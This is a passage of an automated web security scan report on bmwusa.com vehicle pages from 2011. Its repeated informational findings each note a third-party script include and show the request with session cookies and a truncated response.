Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:33 GMT;path=/
Content-Length: 229185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.213. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:14 GMT;path=/
Content-Length: 229186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.214. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:34 GMT;path=/
Content-Length: 215354


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.215. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:47:33 GMT;path=/
Content-Length: 215355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.216. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:30 GMT;path=/
Content-Length: 202064


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.217. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:33:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:53:18 GMT;path=/
Content-Length: 212078


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.218. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:38 GMT;path=/
Content-Length: 212079


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.219. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:32:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:52:23 GMT;path=/
Content-Length: 229552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.220. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:31:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:51:40 GMT;path=/
Content-Length: 229553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.221. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:51 GMT;path=/
Content-Length: 215531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.222. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/activehybrid750li/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:44 GMT;path=/
Content-Length: 215532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.223. http://www.bmwusa.com/standard/content/vehicles/2011/7/allnew7series.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/allnew7series.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/allnew7series.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:05:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:25:58 GMT;path=/
Content-Length: 179251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.224. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:59 GMT;path=/
Content-Length: 222823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.225. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:34:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:54:18 GMT;path=/
Content-Length: 222824


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.226. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/alpinab7/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/7/alpinab7/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
